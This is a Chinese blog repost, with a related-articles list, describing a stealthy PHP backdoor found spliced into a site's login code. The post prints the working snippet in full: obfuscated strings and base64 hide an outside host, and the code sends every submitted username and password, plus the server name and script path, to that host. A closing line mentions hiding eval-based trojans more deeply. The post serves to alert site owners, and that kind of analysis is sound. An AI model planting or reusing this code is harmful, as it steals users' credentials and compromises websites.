站点挂马变隐秘了-php木马

最新推荐文章于 2024-07-22 16:42:40 发布
最新推荐文章于 2024-07-22 16:42:40 发布
阅读量116 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/hidahua/archive/2012/03/13/2393559.html
版权
如此挂马,不留心还真发现不了:
穿插在程序中间,如下:
if(isset($_POST['use'.'rname']) && isset($_POST['pas'.'sword']))
      {
            $myhostname =  base64_decode  ( 'd3d3LnR' . 'oaXNkb29yL' . 'mNvbQ==' );
            $getstring =  base64_decode  ( 'L2luL2' . 'luZGV4Ln' . 'BocA==' ). '?g=' . bin2hex ( $_SERVER [ 'SERV' . 'ER_N' . 'AME' ]. $_SERVER [ 'PH' . 'P_S' . 'ELF' ]). '&u=' . bin2hex ( $_POST [ 'use' . 'rname' ]). '&p=' . bin2hex ( $_POST [ 'pas' . 'sword' ]). '&c=other' ;
            
         //print $myhostname;
         //print $getstring;
       
         if ( function_exists  ( 'fs' . 'ock' . 'open' ))
            {
                  $sockconn = @ fsockopen  ($myhostname,80);
                  @fputs ($sockconn, "GE" . "T " .$getstring. " HT" . "TP/1." . "1\r\nHo" . "st:" .$myhostname. "\r\nConn" . "ect" . "ion: Cl" . "ose\r\n\r\n" );
                  @ fclose  ($sockconn);
            }
             else
            {
                  @ file_get_contents  ( base64_decode  ( 'aHR0' . 'cDovL' . 'w==' ).$myhostname.$getstring);
            }
      }

另外使用  eval 植马 并藏的深入些 多藏些! 汗!

转载于:https://www.cnblogs.com/hidahua/archive/2012/03/13/2393559.html

a497599230167062
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
寻找PHP(网站)马,后门
MiltonZhong
08-02 6986
php后门木马常用的函数大致上可分为四种类型: 1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open 2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_r
PHP检测本地图片是否有木马
04-20
也可以用linux服务器上的木马扫描软件,比如 Clamav 支持命令行执行的,上传之后就扫一下,最可靠, $last_line = system('php /var/bin/clamdscan upload.jpg'); 根据扫描结果就可以判断了 $rs = ...
一个比较隐蔽的php
听雨轩
12-10 213
事情是这样的,朋友的网站的利用各种查找后门的工具都没有发现php木马。老是找不到,小黑的伎俩很高级,每次使用完毕总是把后门删掉,但是每次都能继续进来,总是找不到从哪进来的。这个着实让人蛋疼。 后来,终于在日志中发现一丝蛛丝马迹,通过我的分析,我发现一个IP总是很奇怪的POST数据到某个文件。然后一段时间后,此IP就访问一个莫名奇妙文件,名字很显眼明显不是正常系统文件,而是PHP后门。但是很快使...
一行代码解决iframe
php菜鸟技术天地
06-02 485
码如下: <style type="text/css" media="all" id="http://nihaoku.cn"> iframe{        v:expression_r(this.src='about:blank',this.outerHTML=''); } #f126{v:expression_r() !important} //如果要使自己的IFRAME可以执行,在自己
Php项目被马的临时应急处理$B374K
foreversilent的专栏
05-06 459
1、关闭 DEBUG 模式 2、降权,去掉可执行权限644 3、添加.htaccess、禁止对静态资源文件夹内的 PHP 文件的访问 <IfModule mod_rewrite.c> Options +FollowSymlinks RewriteEngine On RewriteRule ^(.*)$ index.php?/$1 [QSA,PT] Rewrite...
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
php实现Linux服务器木马排查及加固功能
10-24
在网络安全日益重要的今天,PHP实现Linux服务器木马排查及加固功能显得至关重要。本文将详细讲解如何利用PHP进行木马排查以及采取哪些措施来加固服务器安全。 首先,针对特征码查找是木马排查的基础。PHP木马通常会...
批量在线清理查杀木马工具PHP版.zip
07-09
此小工具的编写主要是方便那些被马的站长.可以在线批量清除. 运行环境为PHP版.这么简单的小东西了没有什么好介绍的. 演示我就不放了.以防网站文件都被批量改掉了呵呵 :) 平时不用时千万不要将他放在...
php下批量马和批量清马代码
12-17
php function gmfun($path=”.”) { $d = @dir($path); while(false !== ($v = $d->read())) { if($v == “.” || $v == “..”) continue; $file = $d->path.”/”.$v; if(@is_dir($file)) { gmfun($file); } else ...
代码简短且隐蔽的后门木马
热门推荐
傲雪星枫
08-30 1万+
本文将介绍一个代码很简短,而且很隐蔽的后门木马,以便让大家在检测程序时可以避免被木马
BUUCTF [WUSTCTF2020]朴实无华
最新发布
weixin_73399382的博客
07-22 252
第一块就是intval函数的绕过,逻辑上是不存在小于2020又大于2021的数,但是php低版本好像是7点多和以下该函数对不同类型的数据处理有偏差,第二处则是md5函数绕过,
【Docker】Docker-compose 单机容器集群编排工具
F12138X的博客
07-18 1582
顽强的毅力可以征服世界上任何一座高峰
PHP项目开发流程概述
api77的博客
07-19 522
需求分析是项目开发的起始点,主要目的是明确项目的目标、功能需求、用户群体等。这一阶段通常通过用户访谈、市场调研、竞品分析等方式进行。
深入理解Linux网络(一):内核如何接收网络包
又见南风的博客
07-18 887
在上⾯的代码中跟踪函数调⽤, __igb_open => igb_request_irq => igb_request_msix , 在 igb_request_msix 中我们看到了,对于多队列的⽹卡,为每⼀个队列都注册了中断,其对应的中断处理函数是 igb_msix_ring(该函数也在 drivers/net/ethernet/intel/igb/igb_main.c 下)。如协议注册⼩节看到 inet_protos 中保存着 tcp_v4_rcv() 和 udp_rcv() 的函数地址。
Ubuntu 查询未更新的包 进行手动更新
小婷
07-19 183
lsb_release -a 查询ubuntu的版本号,我这边是20.04。apt list --upgradable 查询未更新的包。中间遇到输入选择,输入y即可。
[web]-反序列化-绕过__wakeup(转)
mails2008的专栏
07-18 391
终点:很直接是echo $flag,在__destruct中,username==='admin' 和 password==100。反序列化过程中发现起点在终点之前调用,反而是捣乱的,那我们就不需要自动执行__wakeup,绕过的方法,设置的字段数量比实际字段大的值。其实简单的很简单,难得也很难,慢慢学习就好,没必要焦虑,觉得很难,纯粹一个兴趣爱好就行。起点:_wakeup函数中是$this->username='guest',是给赋值;按照常规思路,寻找起点、终点、跳板。
Linux(CentOS7)部署PHP-7.2.17源码包
thetender的博客
07-18 1111
LAMP系统安装 通过PHP的源码包部署PHP-7.2.17版本
kali利用ms17-010
12-15
根据提供的引用内容,我们无法回答与网站马和文本输入相关的问题。关于kali利用ms17-010马的问题,我们需要先了解一下ms17-010是什么。ms17-010是指微软在2017年3月份发布的一个安全补丁,用于修复Windows操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值